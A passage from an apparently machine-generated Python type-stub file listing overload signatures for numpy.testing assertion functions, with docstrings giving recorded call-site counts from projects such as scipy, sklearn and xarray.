x: scipy.stats.stats.KurtosistestResult, y: Tuple[float, float]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.mstats_basic.SkewtestResult, y: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.mstats_basic.KurtosistestResult, y: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.mstats_basic.NormaltestResult, y: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: scipy.stats.stats.MannwhitneyuResult, y: Tuple[float, float], decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float32, numpy.float32, numpy.float32, numpy.float32],
y: Tuple[float, float, float, float],
decimal: int,
):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
y: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
decimal: int,
):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: list):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
y: Tuple[int, int, int, int],
decimal: int,
):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.float64, y: List[int]):
"""
usage.matplotlib: 1
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ma.core.MaskedArray, y: numpy.ma.core.MaskedArray
):
"""
usage.matplotlib: 4
"""
...
@overload
def assert_array_almost_equal(x: numpy.ma.core.MaskedArray, y: List[Union[int, float]]):
"""
usage.matplotlib: 3
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: numpy.ma.core.MaskedArray):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ma.core.MaskedArray, y: List[int]):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ma.core.MaskedArray, y: numpy.ndarray):
"""
usage.matplotlib: 7
"""
...
@overload
def assert_array_almost_equal(x: List[numpy.float64], y: numpy.ma.core.MaskedArray):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.ma.core.MaskedArray, y: List[float]):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.float64, numpy.float64], y: List[float], decimal: int
):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_array_almost_equal(x: List[List[float]], y: numpy.ndarray):
"""
usage.matplotlib: 5
usage.sklearn: 6
"""
...
@overload
def assert_array_almost_equal(x: dask.array.core.Array, y: numpy.ndarray):
"""
usage.dask: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["X != TP'"]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["Y != UQ'"]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["rotation on X failed"]
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["rotation on Y failed"]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(
x: Tuple[numpy.ndarray, numpy.ndarray], y: Tuple[numpy.ndarray, numpy.ndarray]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[int], err_msg: str):
"""
usage.sklearn: 4
"""
...
@overload
def assert_array_almost_equal(x: List[Union[float, int]], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: numpy.memmap, decimal: int):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: List[numpy.int64], y: numpy.ndarray):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: List[Union[float, int]], err_msg: str
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(x: numpy.float32, y: numpy.float64):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.float32, y: numpy.float64, decimal: int):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[List[int]], decimal: int):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: List[numpy.int64], y: List[numpy.int64]):
"""
usage.sklearn: 3
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray,
y: numpy.ndarray,
decimal: int,
err_msg: Literal["with solver = sag"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray,
y: numpy.ndarray,
decimal: int,
err_msg: Literal["with solver = saga"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray,
y: numpy.ndarray,
decimal: int,
err_msg: Literal["with solver = lbfgs"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(
x: List[numpy.float64], y: List[numpy.float64], decimal: int
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: numpy.ndarray, decimal: bool):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: numpy.ndarray, y: List[numpy.int64]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(
x: numpy.ndarray, y: Tuple[numpy.float64, numpy.float64], decimal: int
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: int, y: numpy.float64, decimal: int):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_almost_equal(x: int, y: numpy.int64):
"""
usage.sklearn: 1
"""
...
# Catch-all signature closing the `assert_array_almost_equal` overload group
# above. This file is machine-generated from recorded downstream API usage;
# the docstring lines record how many call sites each project contributed.
# NOTE(review): `decimal: Union[bool, int]` is presumably because at least one
# recorded call site passed a bool (bool is a subtype of int) — an artifact of
# the recorder, not an endorsement of passing bools; confirm against the
# upstream numpy.testing signature before tightening.
def assert_array_almost_equal(
    x: object, y: object, decimal: Union[bool, int] = ..., err_msg: str = ...
):
    """
    Assert two array-like objects agree to ``decimal`` places (stub).

    Recorded call-site counts per downstream project:

    usage.dask: 1
    usage.matplotlib: 86
    usage.scipy: 3904
    usage.skimage: 69
    usage.sklearn: 1569
    """
    ...
# ---------------------------------------------------------------------------
# assert_array_almost_equal_nulp: generated overload set.
# One @overload per argument-type combination observed in recorded downstream
# usage, followed by a single catch-all implementation signature. The
# per-overload docstrings are recorded usage counts (data) and are kept
# verbatim; the stub bodies are intentionally `...`.
# ---------------------------------------------------------------------------
@overload
def assert_array_almost_equal_nulp(x: numpy.ndarray, y: numpy.ndarray):
    """
    usage.matplotlib: 1
    usage.scipy: 11
    usage.skimage: 1
    """
    ...

@overload
def assert_array_almost_equal_nulp(
    x: numpy.ma.core.MaskedArray, y: numpy.ma.core.MaskedArray
):
    """
    usage.skimage: 1
    """
    ...

@overload
def assert_array_almost_equal_nulp(x: numpy.ma.core.MaskedArray, y: numpy.float64):
    """
    usage.skimage: 2
    """
    ...

@overload
def assert_array_almost_equal_nulp(x: numpy.ndarray, y: numpy.ndarray, nulp: int):
    """
    usage.scipy: 44
    """
    ...

@overload
def assert_array_almost_equal_nulp(x: numpy.ndarray, y: numpy.ndarray, nulp: float):
    """
    usage.scipy: 4
    """
    ...

@overload
def assert_array_almost_equal_nulp(x: int, y: int, nulp: int):
    """
    usage.scipy: 1
    """
    ...

@overload
def assert_array_almost_equal_nulp(x: float, y: float, nulp: int):
    """
    usage.scipy: 1
    """
    ...

@overload
def assert_array_almost_equal_nulp(x: numpy.float64, y: numpy.float64, nulp: int):
    """
    usage.scipy: 1
    """
    ...

@overload
def assert_array_almost_equal_nulp(x: float, y: numpy.float64, nulp: int):
    """
    usage.scipy: 1
    """
    ...

@overload
def assert_array_almost_equal_nulp(x: numpy.matrix, y: numpy.ndarray):
    """
    usage.scipy: 2
    """
    ...

@overload
def assert_array_almost_equal_nulp(x: numpy.float64, y: numpy.float64):
    """
    usage.scipy: 1
    """
    ...

@overload
def assert_array_almost_equal_nulp(x: numpy.float64, y: float, nulp: int):
    """
    usage.scipy: 1
    """
    ...

# Catch-all signature for the overload set above. `y`'s Union is the join of
# every y-type observed in the recorded calls; `nulp` was seen as both int
# and float (hence Union[int, float]).
def assert_array_almost_equal_nulp(
    x: object,
    y: Union[numpy.ndarray, numpy.ma.core.MaskedArray, float, int, numpy.float64],
    nulp: Union[int, float] = ...,
):
    """
    Assert ``x`` and ``y`` agree to within ``nulp`` units in the last place (stub).

    Recorded call-site counts per downstream project:

    usage.matplotlib: 1
    usage.scipy: 67
    usage.skimage: 4
    """
    ...
...
@overload
def assert_array_equal(x: List[int], y: List[int]):
"""
usage.matplotlib: 5
usage.scipy: 25
usage.skimage: 6
usage.sklearn: 13
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: numpy.ndarray):
"""
usage.dask: 22
usage.matplotlib: 106
usage.scipy: 663
usage.skimage: 321
usage.sklearn: 919
usage.xarray: 164
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: int):
"""
usage.scipy: 7
usage.skimage: 13
usage.sklearn: 10
"""
...
@overload
def assert_array_equal(x: Tuple[numpy.uint8, numpy.uint8], y: List[int]):
"""
usage.skimage: 1
"""
...
@overload
def assert_array_equal(x: Tuple[int, int], y: List[int]):
"""
usage.skimage: 2
usage.sklearn: 1
usage.xarray: 5
"""
...
@overload
def assert_array_equal(x: Tuple[numpy.float64, numpy.float64], y: List[float]):
"""
usage.skimage: 1
"""
...
@overload
def assert_array_equal(x: Tuple[float, float], y: List[float]):
"""
usage.skimage: 1
"""
...
@overload
def assert_array_equal(x: Tuple[int, int], y: Tuple[int, int]):
"""
usage.scipy: 38
usage.skimage: 3
usage.sklearn: 10
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[int]):
"""
usage.matplotlib: 10
usage.scipy: 108
usage.skimage: 11
usage.sklearn: 190
usage.xarray: 7
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: Tuple[bool, bool, bool, bool]):
"""
usage.skimage: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: Tuple[float, float]):
"""
usage.skimage: 3
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: Tuple[int, int]):
"""
usage.skimage: 1
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[List[List[Tuple[int, int]]]]):
"""
usage.skimage: 3
"""
...
@overload
def assert_array_equal(x: List[Tuple[int, int]], y: List[Tuple[int, int]]):
"""
usage.scipy: 3
usage.skimage: 8
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[List[int]]):
"""
usage.matplotlib: 12
usage.scipy: 56
usage.skimage: 12
usage.sklearn: 33
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[List[float]]):
"""
usage.matplotlib: 1
usage.scipy: 8
usage.skimage: 6
usage.sklearn: 14
"""
...
@overload
def assert_array_equal(x: int, y: int):
"""
usage.matplotlib: 3
usage.scipy: 8
usage.skimage: 7
usage.sklearn: 2
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: skimage.util._map_array.ArrayMap, y: numpy.ndarray):
"""
usage.skimage: 8
"""
...
@overload
def assert_array_equal(x: Tuple[int, int, int], y: Tuple[float, float, int]):
"""
usage.skimage: 3
"""
...
@overload
def assert_array_equal(x: Tuple[int, int], y: Tuple[float, float]):
"""
usage.skimage: 2
"""
...
@overload
def assert_array_equal(x: Tuple[int], y: numpy.ndarray):
"""
usage.skimage: 4
"""
...
@overload
def assert_array_equal(x: Tuple[int, int], y: numpy.ndarray):
"""
usage.skimage: 4
"""
...
@overload
def assert_array_equal(x: Tuple[int, int, int], y: numpy.ndarray):
"""
usage.skimage: 4
"""
...
@overload
def assert_array_equal(x: Tuple[int, int, int, int], y: numpy.ndarray):
"""
usage.skimage: 4
"""
...
@overload
def assert_array_equal(x: Tuple[int, int, int], y: Tuple[int, int, int]):
"""
usage.scipy: 29
usage.skimage: 1
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: netCDF4._netCDF4.Variable, y: numpy.ndarray):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: Tuple[int], y: Tuple[int]):
"""
usage.scipy: 33
usage.sklearn: 3
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.ma.core.MaskedArray, y: numpy.ma.core.MaskedArray):
"""
usage.matplotlib: 3
usage.xarray: 2
"""
...
@overload
def assert_array_equal(
    x: List[Literal["strings", "of", "list"]], y: List[Literal["strings", "of", "list"]]
) -> None:
    """
    usage.xarray: 1
    """
    ...
@overload
def assert_array_equal(x: List[Literal["one element"]], y: Literal["one element"]):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: Tuple[float, float, float], y: List[float]):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: Tuple[float], y: List[float]):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: pandas.core.indexes.numeric.Int64Index):
"""
usage.xarray: 3
"""
...
@overload
def assert_array_equal(
x: pandas.core.indexes.datetimes.DatetimeIndex,
y: pandas.core.indexes.datetimes.DatetimeIndex,
):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: xarray.coding.strings.StackedBytesArray):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: xarray.coding.strings.StackedBytesArray, y: numpy.ndarray):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: int, y: numpy.int64):
"""
usage.scipy: 1
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: List[int], y: numpy.ndarray):
"""
usage.matplotlib: 1
usage.scipy: 3
usage.sklearn: 26
usage.xarray: 4
"""
...
@overload
def assert_array_equal(x: List[List[int]], y: numpy.ndarray):
"""
usage.sklearn: 22
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: numpy.int64):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: List[float], y: numpy.ndarray):
"""
usage.matplotlib: 1
usage.scipy: 1
usage.xarray: 3
"""
...
@overload
def assert_array_equal(x: numpy.int32, y: numpy.int64):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: numpy.ndarray, y: pandas.core.indexes.datetimes.DatetimeIndex
):
"""
usage.xarray: 3
"""
...
@overload
def assert_array_equal(x: numpy.timedelta64, y: numpy.ndarray):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(
x: Dict[Literal["attr"], Literal["da"]], y: Dict[Literal["attr"], Literal["da"]]
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: Dict[Literal["attr"], Literal["da_coord"]],
y: Dict[Literal["attr"], Literal["da_coord"]],
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: Dict[Literal["attr"], Literal["ds"]], y: Dict[Literal["attr"], Literal["ds"]]
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: xarray.conventions.BoolTypeArray, y: numpy.ndarray):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: xarray.conventions.NativeEndiannessArray, y: numpy.ndarray):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: numpy.ndarray, y: List[Literal["2265-10-28T00:00:00", "2000-01-01T00:00:00"]]
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: xarray.core.variable.Variable, y: xarray.core.dataarray.DataArray
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: xarray.core.dataarray.DataArray, y: numpy.ndarray):
"""
usage.xarray: 6
"""
...
@overload
def assert_array_equal(
x: xarray.core.dataarray.DataArray, y: xarray.core.variable.Variable
):
"""
usage.xarray: 7
"""
...
@overload
def assert_array_equal(
x: xarray.core.dataarray.DataArray, y: xarray.core.dataarray.DataArray
):
"""
usage.xarray: 9
"""
...
@overload
def assert_array_equal(x: range, y: List[int]):
"""
usage.sklearn: 1
usage.xarray: 2
"""
...
@overload
def assert_array_equal(
x: pandas.core.indexes.base.Index, y: pandas.core.indexes.base.Index
):
"""
usage.sklearn: 1
usage.xarray: 3
"""
...
@overload
def assert_array_equal(x: Literal["x"], y: Literal["x"]):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: pandas.core.indexes.base.Index, y: List[Literal["c", "b", "a"]]
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: pandas.core.indexes.numeric.Int64Index, y: List[int]):
"""
usage.xarray: 5
"""
...
@overload
def assert_array_equal(x: Literal["foo"], y: Literal["foo"]):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.ma.core.MaskedArray, y: numpy.ndarray):
"""
usage.matplotlib: 2
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: xarray.core.dataarray.DataArray, y: numpy.float64):
"""
usage.xarray: 3
"""
...
@overload
def assert_array_equal(
x: xarray.core.dataarray.DataArray, y: pandas.core.series.Series
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: xarray.core.dataarray.DataArray, y: List[Literal["b", "a"]]):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: xarray.core.dataarray.DataArray, y: List[str]):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: xarray.core.dataarray.DataArray, y: List[Literal["b"]]):
"""
usage.xarray: 3
"""
...
@overload
def assert_array_equal(x: xarray.core.dataarray.DataArray, y: List[int]):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: Literal["DJF"]):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: List[Literal["SON", "JJA", "MAM", "DJF"]], y: xarray.core.dataarray.DataArray
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: xarray.core.dataarray.DataArray, y: xarray.coding.cftimeindex.CFTimeIndex
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: xarray.core.dataarray.DataArray):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: dask.array.core.Array, y: numpy.ndarray):
"""
usage.dask: 12
usage.xarray: 4
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: numpy.float64):
"""
usage.scipy: 1
usage.sklearn: 5
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: None, y: None) -> None:
    """
    usage.xarray: 1
    """
    ...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[bool]):
"""
usage.scipy: 5
usage.sklearn: 1
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
    # NOTE(review): `slice[...]` is not subscriptable at runtime on older
    # Pythons — presumably this file relies on deferred annotation
    # evaluation (stub context / `from __future__ import annotations`);
    # confirm before evaluating these annotations eagerly.
    x: slice[numpy.int64, numpy.int64, numpy.int64], y: slice[int, int, int]
) -> None:
    """
    usage.xarray: 1
    """
    ...
@overload
def assert_array_equal(
x: pandas.core.indexes.multi.MultiIndex, y: pandas.core.indexes.multi.MultiIndex
):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: xarray.core.variable.Variable):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(
x: xarray.core.variable.Variable, y: xarray.core.variable.Variable
):
"""
usage.xarray: 9
"""
...
@overload
def assert_array_equal(x: xarray.core.indexing.CopyOnWriteArray, y: numpy.ndarray):
"""
usage.xarray: 3
"""
...
@overload
def assert_array_equal(x: xarray.core.indexing.MemoryCachedArray, y: numpy.ndarray):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: Tuple[numpy.ndarray], y: List[numpy.ndarray]):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.float64, y: numpy.float64):
"""
usage.scipy: 1
usage.sklearn: 8
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: bool, y: bool):
"""
usage.scipy: 1
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: dask.array.core.Array):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(
x: pandas.core.indexes.datetimes.DatetimeIndex, y: numpy.ndarray
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: int, y: numpy.float64):
"""
usage.scipy: 2
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.float64, y: float):
"""
usage.scipy: 2
usage.sklearn: 1
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.int32, y: int):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: xarray.core.variable.Variable, y: numpy.ndarray):
"""
usage.xarray: 38
"""
...
@overload
def assert_array_equal(x: xarray.core.variable.Variable, y: numpy.int64):
"""
usage.xarray: 9
"""
...
@overload
def assert_array_equal(x: object, y: numpy.ndarray):
"""
usage.xarray: 3
"""
...
@overload
def assert_array_equal(x: xarray.core.variable.Variable, y: object):
"""
usage.xarray: 23
"""
...
@overload
def assert_array_equal(
x: pandas.core.indexes.timedeltas.TimedeltaIndex,
y: pandas.core.indexes.timedeltas.TimedeltaIndex,
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(
x: xarray.coding.cftimeindex.CFTimeIndex, y: xarray.coding.cftimeindex.CFTimeIndex
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: pandas.core.indexes.frozen.FrozenList, y: List[List[int]]):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: pandas.core.indexes.base.Index, y: List[Literal["a", "b"]]):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: xarray.core.variable.IndexVariable, y: numpy.ndarray):
"""
usage.xarray: 4
"""
...
@overload
def assert_array_equal(
x: xarray.core.variable.IndexVariable, y: xarray.core.variable.Variable
):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: xarray.core.variable.IndexVariable, y: numpy.int64):
"""
usage.xarray: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: xarray.core.variable.IndexVariable):
"""
usage.xarray: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Union[int, float]]):
"""
usage.matplotlib: 1
usage.scipy: 5
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[float]):
"""
usage.matplotlib: 1
usage.scipy: 44
usage.sklearn: 11
"""
...
@overload
def assert_array_equal(x: Tuple[numpy.ndarray, numpy.ndarray], y: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Union[float, int]]):
"""
usage.scipy: 4
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: list):
"""
usage.scipy: 34
usage.sklearn: 5
"""
...
@overload
def assert_array_equal(x: Tuple[None, ...], y: Tuple[None, ...]):
"""
usage.scipy: 5
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.ndarray):
"""
usage.scipy: 20
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[List[bool]]):
"""
usage.matplotlib: 1
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: int):
"""
usage.scipy: 1
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal[" "]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: numpy.memmap):
"""
usage.scipy: 7
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: numpy.ndarray, err_msg: str):
"""
usage.scipy: 14
usage.sklearn: 35
"""
...
@overload
def assert_array_equal(x: List[Union[int, float]], y: numpy.ndarray):
"""
usage.scipy: 1
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[numpy.float64]):
"""
usage.matplotlib: 6
usage.scipy: 6
usage.sklearn: 8
"""
...
@overload
def assert_array_equal(
x: List[Tuple[Union[None, numpy.float64], Union[numpy.float64, None]]],
y: List[Tuple[Union[None, int], Union[int, None]]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: List[Tuple[numpy.int64, Union[None, numpy.float64]]],
y: List[Tuple[int, Union[None, int]]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: List[Tuple[None, Union[None, numpy.float64]]],
y: List[Tuple[None, Union[None, int]]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: List[Tuple[Union[None, numpy.float64], numpy.int64]],
y: List[Tuple[Union[None, int], int]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: List[Tuple[Union[None, numpy.float64], None]],
y: List[Tuple[Union[None, int], None]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: List[Tuple[numpy.int64, numpy.int64]], y: List[Tuple[int, int]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: List[Tuple[None, None]], y: List[Tuple[None, None]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: float, y: float):
"""
usage.scipy: 2
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(
x: Tuple[numpy.ndarray, numpy.ndarray], y: Tuple[numpy.ndarray, numpy.ndarray]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_equal(x: numpy.bool_, y: bool):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[List[Union[int, float]]]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: list, y: list):
"""
usage.matplotlib: 2
usage.scipy: 3
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: List[numpy.complex128], y: List[numpy.complex128]):
"""
usage.scipy: 15
"""
...
@overload
def assert_array_equal(x: List[numpy.float64], y: List[numpy.float64]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: List[List[numpy.ndarray]], y: List[List[numpy.ndarray]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[complex]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[List[complex]]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: numpy.complex128) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.ndarray, err_msg: str):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_equal(x: List[numpy.float64], y: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix):
"""
usage.scipy: 264
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.float64, y: int):
"""
usage.scipy: 2
usage.sklearn: 3
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: numpy.matrix):
"""
usage.scipy: 18
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: List[List[int]]):
"""
usage.scipy: 28
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: List[List[Union[float, int]]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: List[List[Union[int, float]]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["slice(None, 2, None)"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["slice(1, 2, None)"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["slice(3, None, None)"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["slice(3, None, 2)"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["slice(8, 3, -1)"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["slice(4, None, -2)"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["0"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["1"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: str):
"""
usage.scipy: 4
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["slice(1, 5, None)"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["-1"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["-2"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["-5"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["array(-1)"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: numpy.matrix, err_msg: Literal["-3"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: numpy.matrix, y: numpy.matrix, err_msg: Literal["(slice(8, 3, -1), 0)"]
